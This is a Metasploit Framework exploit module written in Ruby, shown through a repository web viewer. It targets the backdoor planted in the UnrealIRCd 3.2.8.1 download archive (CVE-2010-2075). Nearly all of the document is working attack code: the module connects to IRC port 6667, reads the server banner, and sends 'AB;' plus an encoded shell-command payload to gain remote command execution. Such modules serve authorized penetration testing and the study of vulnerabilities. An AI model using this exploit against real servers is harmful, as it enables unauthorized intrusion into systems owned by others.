/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb - Metasploit Framework - Metasploit Redmine Interface

| Branch: | Tag: | Revision:

root / modules / exploits / unix / irc / unreal_ircd_3281_backdoor.rb @ master

History | View | Annotate | Download (1.8 kB)

       ##
       # $Id$
       ##
       ##
       # This file is part of the Metasploit Framework and may be subject to
       # redistribution and commercial restrictions. Please see the Metasploit
       # web site for more information on licensing and terms of use.
       #   http://metasploit.com/
       ##
       require 'msf/core'
       class Metasploit3 < Msf::Exploit::Remote
               Rank = ExcellentRanking
               include Msf::Exploit::Remote::Tcp
               def initialize(info = {})
                       super(update_info(info,
                               'Name'           => 'UnrealIRCD 3.2.8.1 Backdoor Command Execution',
                               'Description'    => %q{
                                               This module exploits a malicious backdoor that was added to the
                                       Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
                                       Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
                               },
                               'Author'         => [ 'hdm' ],
                               'License'        => MSF_LICENSE,
                               'Version'        => '$Revision$',
                               'References'     =>
+                                      [
                                               [ 'CVE', '2010-2075' ],
                                               [ 'OSVDB', '65445' ],
                                               [ 'URL', 'http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt' ]
                                       ],
                               'Platform'       => ['unix'],
                               'Arch'           => ARCH_CMD,
                               'Privileged'     => false,
                               'Payload'        =>
+                                      {
                                               'Space'       => 1024,
                                               'DisableNops' => true,
                                               'Compat'      =>
+                                                      {
                                                               'PayloadType' => 'cmd',
                                                               'RequiredCmd' => 'generic perl ruby bash telnet',
+                                                      }
                                       },
                               'Targets'        =>
+                                      [
                                               [ 'Automatic Target', { }]
                                       ],
                               'DefaultTarget' => 0,
                               'DisclosureDate' => 'Jun 12 2010'))
                       register_options(
+                              [
                                       Opt::RPORT(6667)
                               ], self.class)
               end
               def exploit
                       connect
                       print_status("Connected to #{rhost}:#{rport}...")
                       banner = sock.get_once(-1, 30)
                       banner.to_s.split("\n").each do |line|
                               print_line("    #{line}")
                       end
                       print_status("Sending backdoor command...")
                       sock.put("AB;" + payload.encoded + "\n")
                       handler
                       disconnect
               end
       end